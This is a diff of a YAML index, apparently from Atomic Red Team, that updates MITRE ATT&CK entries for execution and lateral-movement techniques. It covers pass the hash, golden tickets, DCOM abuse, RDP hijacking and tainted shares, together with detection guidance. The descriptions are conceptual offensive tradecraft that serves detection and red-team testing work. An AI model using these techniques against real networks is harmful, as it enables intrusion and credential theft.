loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source. + + Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent. + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Script: Script Execution' + x_mitre_platforms: + - Windows + - macOS + - Linux identifier: T1059.005 atomic_tests: - name: Visual Basic script execution to gather local computer information @@ -56657,46 +60098,45 @@ execution: T1059.003: technique: created: '2020-03-09T14:12:31.196Z' - modified: '2020-03-28T17:02:13.722Z' + modified: '2021-04-14T15:36:02.195Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: execution type: attack-pattern + id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62 + description: "Adversaries may abuse the Windows command shell for execution. + The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) + is the primary command prompt on Windows systems. The Windows command prompt + can be used to control almost any aspect of a system, with various permission + levels required for different subsets of commands. \n\nBatch files (ex: .bat + or .cmd) also provide the shell with a list of sequential commands to run, + as well as normal scripting operations such as conditionals and loops. Common + uses of batch files include long or repetitive tasks, or the need to run the + same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) + to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) + to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) + interactively with input and output forwarded over a command and control channel." + name: Windows Command Shell + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059.003 url: https://attack.mitre.org/techniques/T1059/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Windows Command Shell - description: "Adversaries may abuse the Windows command shell for execution. - The Windows command shell (cmd.exe) is the primary command prompt - on Windows systems. The Windows command prompt can be used to control almost - any aspect of a system, with various permission levels required for different - subsets of commands. \n\nBatch files (ex: .bat or .cmd) also provide the shell - with a list of sequential commands to run, as well as normal scripting operations - such as conditionals and loops. Common uses of batch files include long or - repetitive tasks, or the need to run the same set of commands on multiple - systems.\n\nAdversaries may leverage cmd.exe to execute various - commands and payloads. Common uses include cmd.exe /c to execute - a single command, or abusing cmd.exe interactively with input - and output forwarded over a command and control channel." - id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62 - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: |- Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. - x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1059.003 atomic_tests: - name: Create and Execute Batch Script @@ -56818,10 +60258,9 @@ execution: commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)' x_mitre_data_sources: - - Authentication logs - - Netflow/Enclave netflow - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' x_mitre_version: '1.1' x_mitre_is_subtechnique: false identifier: T1047 @@ -57032,17 +60471,17 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:02.024Z' + modified: '2021-04-14T18:09:45.539Z' created: '2020-01-30T17:37:22.261Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls x_mitre_detection: Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Shailesh Tiwary (Indian Army) - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC) @@ -57051,6 +60490,7 @@ lateral-movement: x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1175: technique: @@ -57155,15 +60595,6 @@ lateral-movement: created: '2018-01-16T16:13:52.465Z' x_mitre_deprecated: true x_mitre_version: '2.0' - x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Authentication logs - - DLL monitoring - - Packet capture - - Process monitoring - - Windows Registry - - Windows event logs x_mitre_detection: |- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) @@ -57241,14 +60672,9 @@ lateral-movement: Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. id: attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Process monitoring - - Packet capture - - DLL monitoring - - Authentication logs - - API monitoring - - PowerShell logs + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' x_mitre_permissions_required: - Administrator - SYSTEM @@ -57287,12 +60713,6 @@ lateral-movement: name: powershell T1210: technique: - created: '2018-04-18T17:59:24.739Z' - modified: '2020-02-04T20:14:11.064Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: @@ -57326,6 +60746,14 @@ lateral-movement: name: Exploitation of Remote Services created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + modified: '2021-04-22T20:23:01.478Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_contributors: + - ExtraHop x_mitre_version: '1.1' x_mitre_detection: Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause @@ -57336,9 +60764,8 @@ lateral-movement: for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system. x_mitre_data_sources: - - Windows Error Reporting - - Process monitoring - - File monitoring + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' x_mitre_permissions_required: - User x_mitre_platforms: @@ -57380,23 +60807,20 @@ lateral-movement: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-17T18:26:41.796Z' + modified: '2021-04-14T14:32:14.273Z' created: '2019-09-04T19:26:12.441Z' x_mitre_is_subtechnique: false x_mitre_data_sources: - - SSL/TLS inspection - - DNS records - - Anti-virus - - Web proxy - - File monitoring - - Mail server - - Office 365 trace logs + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Windows - macOS - Linux - Office 365 - SaaS + - Google Workspace x_mitre_contributors: - Tim MalcomVetter - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) @@ -57408,7 +60832,7 @@ lateral-movement: Micro When Phishing Starts from the Inside 2017)' x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1570: technique: @@ -57447,13 +60871,12 @@ lateral-movement: in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.' x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Network protocol analysis - - Process monitoring + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'File: File Creation' + - 'File: File Metadata' x_mitre_platforms: - Linux - macOS @@ -57468,19 +60891,20 @@ lateral-movement: - external_id: CAPEC-644 source_name: capec url: https://capec.mitre.org/data/definitions/644.html - - source_name: NSA Spotting - description: National Security Agency/Central Security Service Information - Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows - Event Log Monitoring. Retrieved September 6, 2018. - url: https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Pass the Hash description: |- - Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. - Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting) + When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + + Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e type: attack-pattern kill_chain_phases: @@ -57488,20 +60912,22 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-23T16:24:34.766Z' + modified: '2021-03-15T21:04:33.228Z' created: '2020-01-30T16:36:51.184Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true - x_mitre_detection: Audit all logon and credential use events and review for - discrepancies. Unusual remote logins that correlate with other suspicious - activity (such as writing and executing binaries) may indicate malicious activity. - NTLM LogonType 3 authentications that are not associated to a domain login - and are not anonymous logins are suspicious. + x_mitre_detection: |- + Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. + + Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender - Travis Smith, Tripwire x_mitre_platforms: - Windows @@ -57619,6 +61045,10 @@ lateral-movement: description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. source_name: Campbell 2014 + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. - url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017. @@ -57630,11 +61060,13 @@ lateral-movement: description: |- Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. - In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) + When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) - [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) + A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) - [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + + Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926 type: attack-pattern kill_chain_phases: @@ -57642,11 +61074,11 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-12T17:03:16.122Z' + modified: '2021-03-15T21:42:11.839Z' created: '2020-01-30T17:03:43.072Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_system_requirements: - Kerberos authentication enabled @@ -57655,7 +61087,9 @@ lateral-movement: Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: - Vincent Le Toux - Ryan Becwar @@ -57739,9 +61173,11 @@ lateral-movement: modified: '2020-03-23T23:24:39.182Z' created: '2020-02-25T18:35:42.765Z' x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: |- Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking. @@ -57835,9 +61271,10 @@ lateral-movement: - Remote Desktop Users - User x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Logon Session: Logon Session Creation' x_mitre_system_requirements: - RDP service enabled, account in the Remote Desktop Users group x_mitre_contributors: @@ -57955,10 +61392,11 @@ lateral-movement: modified: '2020-03-23T23:35:58.129Z' created: '2020-02-25T18:26:16.994Z' x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: |- Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. @@ -58011,19 +61449,13 @@ lateral-movement: will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. x_mitre_data_sources: - - Windows Registry - - Windows event logs - - Process use of network - - Process monitoring - - Process command-line parameters - - PowerShell logs - - Packet capture - - Network protocol analysis - - Netflow/Enclave netflow - - File monitoring - - DLL monitoring - - Authentication logs - - API monitoring + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Network Share: Network Share Access' + - 'Module: Module Load' x_mitre_system_requirements: - Active remote service accepting connections and valid credentials x_mitre_platforms: @@ -58062,8 +61494,10 @@ lateral-movement: x_mitre_is_subtechnique: false x_mitre_version: '1.0' x_mitre_data_sources: - - File monitoring - - Data loss prevention + - 'Process: Process Creation' + - 'File: File Access' + - 'File: File Creation' + - 'Drive: Drive Creation' x_mitre_detection: Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, @@ -58149,10 +61583,11 @@ lateral-movement: - User - Administrator x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Authentication logs - - Process use of network + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Logon Session: Logon Session Creation' + - 'Network Share: Network Share Access' x_mitre_system_requirements: - SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system @@ -58278,6 +61713,21 @@ lateral-movement: elevation_required: true T1021.004: technique: + created: '2020-02-11T18:27:15.774Z' + modified: '2020-03-23T23:43:46.977Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + type: attack-pattern + id: attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6 + description: |- + Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. + + SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell) + name: SSH + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1021.004 @@ -58288,39 +61738,23 @@ lateral-movement: - source_name: SSH Secure Shell url: https://www.ssh.com/ssh description: SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SSH - description: |- - Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. - - SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell) - id: attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - modified: '2020-03-23T23:43:46.977Z' - created: '2020-02-11T18:27:15.774Z' - x_mitre_system_requirements: - - An SSH server is configured and running. - x_mitre_data_sources: - - Authentication logs - - Process use of network - - Network protocol analysis - - Netflow/Enclave netflow + x_mitre_platforms: + - Linux + - macOS + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - - macOS + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + x_mitre_system_requirements: + - An SSH server is configured and running. atomic_tests: [] T1563.001: technique: @@ -58378,7 +61812,11 @@ lateral-movement: x_mitre_system_requirements: - SSH service enabled, trust relationships configured, established connections x_mitre_data_sources: - - Authentication logs + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_contributors: - Anastasios Pingios atomic_tests: [] @@ -58422,9 +61860,6 @@ lateral-movement: x_mitre_deprecated: true x_mitre_is_subtechnique: false x_mitre_version: '1.0' - x_mitre_data_sources: - - File monitoring - - Process monitoring x_mitre_detection: Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use @@ -58447,7 +61882,7 @@ lateral-movement: source_name: capec url: https://capec.mitre.org/data/definitions/187.html description: |- - Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). + Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. @@ -58461,18 +61896,13 @@ lateral-movement: phase_name: execution - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T15:27:01.403Z' + modified: '2020-12-11T17:00:00.938Z' created: '2017-05-31T21:30:57.201Z' x_mitre_is_subtechnique: false x_mitre_version: '2.1' x_mitre_data_sources: - - Authentication logs - - File monitoring - - Third-party application logs - - Windows Registry - - Process monitoring - - Process use of network - - Binary file metadata + - 'Application Log: Application Log Content' + - 'Process: Process Creation' x_mitre_detection: "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities @@ -58505,14 +61935,16 @@ lateral-movement: atomic_tests: [] T1080: technique: - created: '2017-05-31T21:31:01.759Z' - modified: '2020-03-31T22:14:56.107Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Taint Shared Content + description: |2- + + Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. + + A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot) + + Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS. external_references: - source_name: mitre-attack external_id: T1080 @@ -58524,34 +61956,34 @@ lateral-movement: description: Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018. source_name: Retwin Directory Share Pivot - description: |2- - - Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. - - A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot) - - Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS. - name: Taint Shared Content - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c - x_mitre_version: '1.2' - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_contributors: - - Michal Dida, ESET - - David Routin + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + modified: '2020-03-31T22:14:56.107Z' + created: '2017-05-31T21:31:01.759Z' + x_mitre_is_subtechnique: false + x_mitre_system_requirements: + - Access to shared folders and content with write permissions + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User x_mitre_detection: |- Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques. Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content. - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - x_mitre_system_requirements: - - Access to shared folders and content with write permissions - x_mitre_is_subtechnique: false + x_mitre_contributors: + - Michal Dida, ESET + - David Routin + x_mitre_data_sources: + - 'Process: Process Creation' + - 'File: File Creation' + - 'File: File Modification' + - 'Network Share: Network Share Access' + x_mitre_version: '1.2' atomic_tests: [] T1550: technique: @@ -58599,9 +62031,9 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.714Z' + modified: '2021-04-14T18:09:47.427Z' created: '2020-01-30T16:18:36.873Z' - 